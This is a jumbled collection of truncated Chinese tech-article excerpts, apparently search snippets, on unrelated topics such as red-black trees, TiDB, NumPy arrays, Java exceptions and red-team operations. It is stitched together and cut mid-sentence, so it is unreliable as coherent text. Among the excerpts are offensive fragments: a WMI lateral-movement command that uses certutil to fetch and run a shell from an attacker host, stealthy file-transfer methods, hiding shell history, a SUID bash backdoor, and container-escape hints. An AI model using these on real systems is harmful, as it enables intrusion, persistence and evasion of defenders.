01 什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。...在信息安全领域中的红蓝对抗也是类似的思路,一方扮演黑客,另一方扮演防守者进行网络安全攻防演练。在演练过程中,蓝军模拟真实的攻击来评估企业现有防守体系的安全能力,红军对发现的问题做出相应的优化整改。...通过周期性的红蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(红队)代表攻击方,Blue Team(蓝队)代表防守方。...在本文中,笔者将挑选其中较为通用且容易在红蓝对抗中实施的近源渗透技术进行探讨。...从插入电脑到恶意操作执行完所需时间不过几秒,这可以帮助你给那些离开工位不锁屏的同事好好上一课。
Siraj Raval 作为深度学习领域的自媒体人在欧美可以说是无人不知、无人不晓。 凭借在 Youtube 上的指导视频,Siraj Raval 在全世界吸粉无数,堪称是机器学习界的网红。...雷锋字幕组为大家最新译制了 Siraj 深度学习系列,从机器学习和神经网络架构类型到数据可视化、小样本学习等从基础到应用的技巧,争取带领希望掌握神经网络的神奇魔力和想成为深度学习工程师的大家伙早日入坑!...(建议在 Wi-Fi 环境下观看视频,土豪随意~) 为了方便流量不足的小伙伴们在路上看,我们特意整理出了图文版: 数学帮我们定义了神经网络的规则,让我们能够从数据中挖掘更多价值。...假如有了给定的数据,可以用下面的公式来正规化: ? 让这一列中的每一个值减去这列中的最小值,然后再除以这列中的最大值与最小值的差。...同样的运算在下一层内,我们把从第一层得到的值传播到第二层,计算与第二个权矩阵的点乘然后用非线性变换成一个输出概率。 因为我们只有三层神经元,输出值是我们的预测值。
作者简介:薛超,中移物联网有限公司数据库运维高级工程师 中移物联网有限公司是中国移动通信集团公司投资成立的全资子公司,公司按照中国移动整体战略布局,围绕“物联网业务服务的支撑者、专用模组和芯片的提供者、...在我们验证的过程中,发现 3 个节点处理不了,于是我们扩展到 8 个节点,这个时候基本上可以承载整个轨迹服务的数据写入了,但是业务侧的逻辑又变得相当的繁重,维护的成本非常高,因此想找一个中间件来替代代码的分片功能...为了解决这个问题,我们也咨询了官方的同事,进行了一些优化,比如调整批量的更新来减少开销,扩容一个 TiDB 的 server 节点,最重要的是把 TiDB 版本从 2.04 升级到 3.05。...第二,TiDB 兼容现有的 MySQL 的语法和协议,迁移成本低。我们从 MyCat 集群迁移到 TiDB 业务代码都非常少。...在数据迁移方面,历史数据通过开发的迁移小工具,从 MyCat 集群读取出来,然后写到 TiDB 集群,数据是在代码层做的双写,我们很顺利的将数据迁移到了 TiDB。
---- 7.HashMap 中的红黑树原理 红黑树 ? LinkedHashMap ?...越是喧嚣的世界,越需要宁静的思考。
Structures 教你透彻了解红黑树 详细解答 1.stl中的set底层用的什么数据结构?...在实际的系统中,例如,需要使用动态规则的防火墙系统,使用红黑树而不是散列表被实践证明具有更好的伸缩性。Linux内核在管理vm_area_struct时就是采用了红黑树来维护内存块的。...找到树中第i小的结点; [cpp] view plaincopy OS-SELECT(x;,i) r = size[left[x]] + 1; if i == r return... return OS-SELECT(left[x], i) else return OS-SELECT(right[x], i) 思路:size[left[x]]表示在对x为根的子树进行中序遍历时排在... y == y.p.right r = r + y.p.left.size +1 y = y.p return r 思路:x的秩可以视为在对树的中序遍历种
树 树: 数据结构中是以二叉堆的形式出现的 如果从链表的观点出发,相当于是放宽了有序的的要求 允许两个不同位置的元素有相等的序 对于序为n的节点来说,可以指向多个序为n+1的节点: 相应的后者称为前者的孩子...红黑树具有良好的效率,可以在 时间内完成查找,增加,删除操作 Java中的TreeMap, HashMap都是基于红黑树的数据结构实现的 红黑树的性质: 根节点是黑色 节点是红色或者黑色 叶子节点是黑色...2倍 红黑树最短路径: 都是由黑色节点构成 红黑树最长路径: 由红色节点和黑色节点相间构成 根据从任意一个节点到对应的每个叶子节点所有简单路径中都包含相同数目的黑色节点的性质可知最长路径时 : 红色节点数量...第一点要求等价于: 任何一个末代孙节点到根节点的简单路径中,黑色节点数目相同 任何两个末代孙节点抵达任意一个相同父节点的简单路径中,黑色节点数目相同 父节点和叔叔节点都为红色: 如果向已有的红黑树中插入新节点...顺序统计树除了红黑的属性外,节点还包含子系个数的信息size size为当前节点为根的子树的所有节点个数 顺序统计树的插入节点实现: 在实现红黑树的基础上 首先在节点结构体中添加一个成员size 然后修改插入操作
NLP在虚拟现实与增强现实中的引领之力虚拟现实(VR)和增强现实(AR)代表了当前科技领域中最令人激动的发展方向。这两项技术不仅在娱乐行业引起了巨大的关注,还在教育、医疗、培训等领域展现出巨大的潜力。...虚拟现实是一种通过计算机技术创建的模拟环境,使用户感觉好像置身于一个完全不同的现实世界。通过戴上VR头戴设备,用户可以沉浸在虚拟环境中,与其中的元素进行互动,创造出一种全新的感官体验。...NLP在虚拟现实与增强现实中的关键技术2.1 语音识别与交互语音识别是NLP在虚拟现实与增强现实中的关键技术之一。通过NLP算法,系统能够理解用户的语音指令,并以自然的方式与用户进行交互。...在VR和AR应用中,虚拟助手通过NLP算法理解用户的自然语言输入,并以文本或语音的形式回应,为用户提供更智能的体验。...通过情感分析,系统可以感知用户的情绪,并相应地调整虚拟环境中的元素,以提供更加个性化和情感丰富的互动体验。
(Column-major Order),即内存中同列的存在一起。...译文 所谓contiguous array,指的是数组在内存中存放的地址也是连续的(注意内存地址实际是一维的),即访问数组中的下一个元素,直接移动到内存中的下一个地址就可以。...如果想要向下移动一列,则只需要跳过3个块既可(例如,从0到4只需要跳过1,2和3)。 上述数组的转置arr.T则没有了C连续特性,因为同一行中的相邻元素现在并不是在内存中相邻存储的了: ?...这时候arr.T变成了Fortran 连续的(Fortran contiguous),因为相邻列中的元素在内存中相邻存储的了。...从性能上来说,获取内存中相邻的地址比不相邻的地址速度要快很多(从RAM读取一个数值的时候可以连着一起读一块地址中的数值,并且可以保存在Cache中)。这意味着对连续数组的操作会快很多。
前言 " 在阅读HashMap源码时,会发现在HashMap中使用了红黑树,所以需要先了解什么是红黑树,以及其原理。从而再进一步阅读HashMap中的链表到红黑树的转换,红黑树的增删节点等。..." - - 刘志航 什么是红黑树? 红黑树的概念 红黑树的性质 红黑树的操作 在HashMap中是怎么应用的? HashMap 1 什么是红黑树?...红黑树的概念? " 红黑树(英语:Red–black tree)是一种自平衡二叉查找树,是在计算机科学中用到的一种数据结构,典型的用途是实现关联数组。..." —— 维基百科 红黑树的五大性质 " 红黑树是每个节点都带有颜色属性的二叉查找树,颜色为红色或黑色。...(从每个叶子到根的所有路径上不能有两个连续的红色节点。) 从任一节点到其每个叶子的所有简单路径都包含相同数目的黑色节点。
通过这个模型,我们可以方便地从远程计算机获取管理数据,也就是说,你可以在自己的电脑上查看和管理其他电脑的信息。...计算机的用户并且创建一个进程运行cmd.exe程序.而下一步就是将shell下载到目标计算机,这一步中我们需要在新的进程中下载certutil.exe...Credential $credential -ScriptBlock { cmd.exe /c "certutil.exe -urlcache -f -split $url"}Kali端成功回显并且在目标机中也发现...test.exe文件.值得注意的是这段命令中的test.exe&&test.exe中的&&叫做谓词开关,我们可以在这里添加运行其它命令,例如写成:/test.exe /nobreak && test.exe...wmicexec进行横向渗透时,Windows操作系统默认不会将WMI的操作记录在日志中同时无需将wmicexec.py移动到目标机上,所以隐蔽性较高,因为WMI是Windows的管理工具,所以大多数基于
02 Java8 ConcurrentHashMap Java 8及之后版本中的ConcurrentHashMap去除了Segment数组和分段锁方案,使用和HashMap相同的结构,也就是数组、链表和红黑树的结构...table数组中的每个元素实际上存储的都是单链表的头节点或者红黑树的根节点,当向ConcurrentHashMap中插入键-值对时,首先要定位到要插入的桶,也就是要定位到table数组的某个索引下标处。...为此,在Java 8及之后版本的JDK中,ConcurrentHashMap会在一定条件下将内部的链表自动转化为红黑树,如下所示。...可以看出,当ConcurrentHashMap中的数组长度大于或等于64、table数组中任意一个链表的长度大于或等于8时,会将长度大于或等于8的链表转化为红黑树,数组中其他位置的链表保持不变。...通过对本篇的学习,读者能够从源码级别深刻理解线程池的核心原理和执行流程。 为了进一步加深读者对线程池的理解,在本篇的随书源码中,会给出完整的手写线程池的案例程序。 本书特色 1.
在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙,IDS,IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。...busybox httpd busybox httpd -f -p 8000 Download files from HTTP server 以下列出了在 Windows 和 Linux 系统下使用系统自带工具从...协议进行文件传输 搭建简易 SMB Server 搭建简易SMB Server 需要用到 Impacket 项目的 smbserver.py 文件 Impacket 已默认安装在 Kali Linux 系统中...scapy 模块,需要手动安装 代码保存到 dns_reciver.py 文件中 try: from scapy.all import * except: print("Scapy not...下载文件的多种方法
很多年前大家就会讨论先学攻击,还是先学防守,这些年下来,我还是觉得应该先学攻击,防守的学习都是从攻击经验中学习的,防守思路也是从攻击思路中去学习,所以,想学会如何排查后面,就需要先学习怎么安装后门吧”...并且由于空格的缘故,该命令本身也不会被记录 从上面命令之后,我们在同一个终端中,之后的所有命令都不会被记录在历史中,这个命令之前的所有东西都会原样记录在历史中。...需要重新开启历史记录,执行: [Space]set -o history #将环境恢复原状 方式二、从历史记录中删除指定命令 指定某个记录进行删除 history | grep "keyword" 输出历史记录中匹配的命令.../etc/shadow文件中 /etc/shadow 各部分含义: ⽤户名:密码的MD5加密值:⾃系统使⽤以来⼝令被修改的天数:⼝令的最⼩修改间隔:⼝令更改的周期:⼝令失效的天数:⼝令失效以后帐号会被锁定多少天...2、执⾏者对于该程序需要具有x的可执⾏权限 3、本权限仅在执⾏该程序的过程中有效 4、在执⾏过程中执⾏者将具有该程序拥有者的权限 我们可以创建一个suid权限的文件 $cp /bin/bash /tmp
异常:生活中与代码中的无奈 2. 异常的体系结构:错误与异常 3. 异常处理:抓取异常,保障稳定 3.1 throw 和 throws 3.2 try...catch 3.3 finally 4....自定义异常:灵活应对特定问题 结语 在人类的日常生活和编程世界中,异常都是无法绕过的存在。...异常:生活中与代码中的无奈 异常,顾名思义,就是一种与正常情况不符的事件或情况。在生活中,我们时常遇到各种异常,比如拉肚子、被狗咬等。...而在编程中,异常则是指在程序执行过程中遇到的问题,如空指针、数组越界、类型转换异常等。就如同生活中我们会感到不适,需要采取相应措施治疗,代码中的异常也需要得到妥善处理,以确保程序的正常运行。 2....编译时异常:需要在代码编写阶段处理的异常,例如IO异常等。 运行时异常:在程序运行过程中可能发生的异常,如空指针、数组越界等。 3.
lihongwei(62***407) 14:39:02 多个对象(红圈)在EA中怎么画出来的? ?
真实的世界早已破败不堪,人们在残垣断壁之间啃食着恶臭的垃圾,却在幻觉中以为自己在五星级酒店想用丰盛的晚宴。 知道了真相的主人公从窗台奋力一跃,当他睁开眼睛,他重又跌回了那个冰冷的下水道。 3....科幻作家从星辰大海式的太空歌剧,来到了以悲观的反乌托邦、反人类中心主义、赛博朋克、废土等为主题的新的时代。...电影《黑客帝国》的开头,探讨了这一主题,墨菲斯给出了红药丸和蓝药丸,作为电影的主角,注定选择真相的“The One”尼奥自然会选择红药丸,但在现实中的你,让你来选择,你真的有勇气选择那颗红色的药丸吗?...我曾经和大学的一位同学探讨过这个问题,他说:即便世界是假的,一切都是虚拟的,但对我们来说,真的假的又有什么区别,即使我们在《黑客帝国》的世界中,我们活着的目的也仅仅是享受人生,那为什么还要去选择红药丸呢...选择相信哪一个,不正是这部小说的主题 -- 蓝药丸还是红药丸吗?
数据中台的概念由来已久,从技术产品构成上来讲,比如数仓、大数据中间件等产品组件相对完备。但是我们认为依然不能把数据中台建设作为一个技术平台的项目来实施。...金融机构在数字化转型的进程中建立数据中台,必须从战略的高度、组织的保障及认知的更高层面来做规划。...我们知道石油提纯有一系列的标准体系,那么数据资产化也同样需要建立完备的数据资产体系。金融机构数据资产体系建设必须围绕业务价值,从推动业务数据向数据资产转化的角度来构建。...应用层:按照金融企业特定的业务场景,从标签层、主题层抽取数据,面向业务进行加工特定的数据,以为业务提供端到端的数据服务。...当然,有些特定的业务场景需要兼顾性能需求、紧急事物需求,也可能直接从贴源层抓取数据直接服务于特定的业务场景。真正做到在对业务端到端数据服务同时,兼顾数据中台的灵活性、可用性和稳定性。
回顾近几年腾讯蓝军在云原生安全上的探索和沉淀,我们在2018年的时候开始正式投入对Serverless和容器编排技术在攻防场景的预研,并把相关的沉淀服务于多个腾讯基础设施和产品之上,而在近期内外部的红蓝对抗演练中腾讯蓝军也多次依靠在云原生场景上的漏洞挖掘和漏洞利用...从 CGroup 信息中,不仅可以判断我们是否在容器内,也能很方便判断出当前的容器是否在 Kubernetes 的编排环境中。...其思路在于利用Docker容器镜像分层的文件存储结构(Union FS),从 mount 信息中找出宿主机内对应当前容器内部文件结构的路径;则对该路径下的文件操作等同于对容器根目录的文件操作。...1、首先我们需要利用在 release_agent 中提及的方法从 mount 信息中找出宿主机内对应当前容器内部文件结构的路径。 sed -n 's/....[dc19c5f5a428c125aef50ed31372cc73.png] 由于这里10250鉴权当前的Kubernetes设计是默认安全的,所以10255的开放就可能更加容易在红蓝对抗中起到至关重要的作用
比如粉碎、射击手机或是直接扔进水里,但取证专家仍然可以找到手机里的证据。 如何获取损坏了的手机中的数据呢? ?...对于制造商来说,他们使用这些金属抽头来测试电路板,但是在这些金属抽头上焊接电线,调查人员就可以从芯片中提取数据。 这种方法被称为JTAG,主要用于联合任务行动组,也就是编码这种测试特性的协会。...要知道,在过去,专家们通常是将芯片轻轻地从板上拔下来并将它们放入芯片读取器中来实现数据获取的,但是金属引脚很细。一旦损坏它们,则获取数据就会变得非常困难甚至失败。 ?...图2:数字取证专家通常可以使用JTAG方法从损坏的手机中提取数据 数据提取 几年前,专家发现,与其将芯片直接从电路板上拉下来,不如像从导线上剥去绝缘层一样,将它们放在车床上,磨掉板的另一面,直到引脚暴露出来...比较结果表明,JTAG和Chip-off均提取了数据而没有对其进行更改,但是某些软件工具比其他工具更擅长理解数据,尤其是那些来自社交媒体应用程序中的数据。
比如说:黑客攻击了你的服务器,删除了所有的备份,怎么恢复服务器的运行? 你的 DRP 可能是:多级备份,数据除了本地备份外,还备份到一个权限更高的,远程的,物理上隔离的地方。...gliffy 的 Eric(Head of Engineer)说 "data transfer is taking longer than expected",可见第二种方案中,他们的备份和生产环境在不同的物理位置...在这样的前提下,1PB 的数据需要大概 243 个小时进行传输,而从 gliffy 的日志看,他们花费在数据传输上所花的时间大概 12 - 24 小时,所以,大致猜测 gliffy 要传输的数据在 50...注意,在网络上传输的数据很可能是压缩过的数据,所以,实际的数据量可以要比这个大一倍到几倍。 对于 gliffy 这样的工具而言,48 小时还不足以致命,但在线交易,游戏这样的平台,可能就是灾难性的。...(对于 gitlab,即便权限系统被绕过,在执行包含有 rm -rf 的脚本前,也会先备份,在备份期间,清醒过来的 sysadmin 还可以撤销这个操作,即便没撤销,还有一份最新的磁盘映像可以恢复) 希望大家从
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
